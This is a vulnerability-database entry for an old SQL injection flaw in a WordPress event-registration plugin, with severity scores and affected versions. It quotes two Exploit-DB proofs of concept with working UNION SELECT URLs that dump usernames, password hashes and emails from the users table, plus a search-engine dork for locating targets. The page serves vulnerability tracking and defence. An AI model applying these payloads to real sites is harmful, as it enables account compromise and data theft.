CVE-2010-4839
published 2011-09-14CVE-2010-4839: SQL injection vulnerability in the Event Registration plugin 5.32 and earlier for WordPress allows remote attackers to execute arbitrary SQL commands via the…
PriorityP349high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
2.76%
84.5th percentile
SQL injection vulnerability in the Event Registration plugin 5.32 and earlier for WordPress allows remote attackers to execute arbitrary SQL commands via the event_id parameter in a register action.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| edgetechweb | event_registration | <= 5.32 | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
WordPress Plugin Event Registration 5.44 - SQL Injection
exploitdb·2011-09-09
CVE-2010-4839 WordPress Plugin Event Registration 5.44 - SQL Injection
WordPress Plugin Event Registration 5.44 - SQL Injection
---
# Exploit Title: Wordpress Event Registration plugin <= 5.44 SQl Injection Vulnerability
# Google Dork: "?regevent_action=register&event_id"
# Date: 2011-09-09
# Author: serk
# Vendor: http://edgetechweb.com/
# Software Link: https://wordpress.org/extend/plugins/events-registration/
# Version: 5.44
[ exploit ]
domain.tld/events-2/?regevent_action=register&event_id=2%20UNION%20SELECT%201,concat%28user_login,0x3a,user_pass,0x3a,user_email%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33%20from%20wp_users--
Exploit-DB
WordPress Plugin Event Registration 5.32 - SQL Injection
exploitdb·2010-11-13
CVE-2010-4839 WordPress Plugin Event Registration 5.32 - SQL Injection
WordPress Plugin Event Registration 5.32 - SQL Injection
---
[ Wordpress Event Registration SQL injection ]
# Author: k3m4n9i
# Homepage: http://alko.web.id/
# Date: 13 November, 2010
[ Software Information ]
[+] Vendor : http://edgetechweb.com/
[+] Software Link: http://wordpress.org/extend/plugins/event-registration/
[+] Version: 5.32 or lower
[ Proof of Concept ]
[-] Vulnerable File
http://server/events/?regevent_action=register&event_id=[gotcha]
[-] Xpl
%20union%20select%201,group_concat(user_login,0x3a,user_pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50%20from%20wp_users--
No writeups or analysis indexed.
2011-09-14
Published